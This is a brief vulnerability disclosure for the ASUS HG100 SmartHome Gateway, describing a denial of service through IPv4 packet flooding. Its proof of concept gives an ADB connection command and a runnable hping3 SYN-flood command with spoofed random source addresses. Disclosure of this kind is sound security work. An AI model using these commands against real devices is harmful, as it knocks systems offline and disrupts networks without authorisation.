Description:ASUS HG100 devices allow denial of service via an IPv4 packet flood.
This vulnerability was discovered by Mars Cheng at National Center for Cyber Security Technology (NCCST)
Introduction ASUS HG100 SmartHome GateWay
|Length x width x height||Weight||Wireless connection|
|152 x 67 x 167 mm||256g||WiFi 802.11b/g/n ; ZigBee PRO ; BlueTooth 4.0|
Proof of Concept
1.Connect to ASUS Gateway HG100 with ADB
adb connect 192.168.0.108 adb shell
2.Execute IP v4 flood attack
- Use Hping3 tool to execute DoS attack
hping3 -V -c 1000000 -d 120 -S -w 64 --flood --rand-source 192.168.0.108
- Confirm packets status
3.Confirm device status
- Unable to connect to ADB, and DoS attack success.
- February 6, 2018 Reported to ASUS Security